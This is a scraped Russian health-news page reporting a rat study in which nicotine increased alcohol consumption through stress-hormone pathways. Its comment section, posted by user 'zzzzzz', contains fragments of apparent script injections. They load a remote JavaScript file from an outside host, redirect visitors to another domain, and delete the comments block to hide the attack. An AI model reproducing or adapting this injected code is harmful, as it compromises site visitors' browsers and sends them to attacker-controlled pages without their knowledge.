Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Курение приводит к алкого...  >>  Курение приводит к алкоголизму! Что делать?
 
Обратная связь
 

Курение приводит к алкоголизму! Что делать?

Размер шрифта
22 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Известно, что курение нередко сопутствует другим вредным привычкам, в том числе и алкоголизму. С чем конкретно это связано до сих пор не вполне понятно. Американские ученые из Хьюстонского медицинского университета решили разобраться в этой проблеме.

Курение приводит к алкоголизму! Что делать?

Исследование проводилось на лабораторных животных. Конечно, трудно заставить крысу закурить, но вполне можно вколоть ей никотин. Ученые так и сделали, а потом проанализировали психоневрологические последствия. Оказалось, что даже однократное воздействие никотина приводит к изменению восприятия мозгом алкоголя. По-видимому, это связано с влиянием на систему стресс-гормонов.

«Наше открытие позволяет по-новому взглянуть на эту важную проблему. Мы надеемся, что в дальнейшем это позволит побороть порочную связь между алкоголем и табаком», – утверждает доктор Джон Дэни, глава исследования.

Доктор Дэни и его коллеги наблюдали следующие картину: крысы под действием никотина проявляли намного более живой интерес к алкоголю, чем их «некурящие» собратья. Более того – эти животные в буквальном смысле теряли чувство меры! Вместо того, чтобы через некоторое время остановиться, крысы продолжали «наклюкиваться» до бессознательного состояния.

Ученые приписывают этому явлению два механизма. Во-первых, никотин повышает экспрессию рецепторов стресс-гормонов, в том числе в центральной нервной системе. Это, в свою очередь, приводит к последующему торможению ингибиторных систем в мозге, которые в норме сообщают нам: «Хватит, пора остановиться!»

«Молодые нередко начинают курить из любопытства. Это своего рода эксперимент, проба жизни на вкус. К сожалению, в будущем это любопытство может довести до беды. Начиная курить, подросток рискует в будущем стать алкоголиком», – отмечает Дэни. «Таким образом, мы убеждены, что необходим строгий контроль со стороны как родителей, так и государства с тем, чтобы не допустить появления и развития этой вредоносной привычки у молодых людей».

Другое немаловажное значение этой научной работы состоит в том, что она дает дополнительную пищу для размышления фармакологам. Дэни и его команда доказали, что стресс-гормоны играют значительную роль в развитии алкогольной зависимости. Зная об этом, специалисты могут разработать новое поколение лекарств против алкоголизма.

Результаты исследования были опубликованы в июльском номере журнала «Нейрон».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чья печень в опасности: алкотипы. Часть 5   Для кого алкоголь опасней всего   Чья печень в опасности: алкотипы. Часть 4   Что нельзя есть с больной печенью  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как студенческая жизнь влияет на здоровье
Как бросить курить
Как понять, что вы пьете много?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.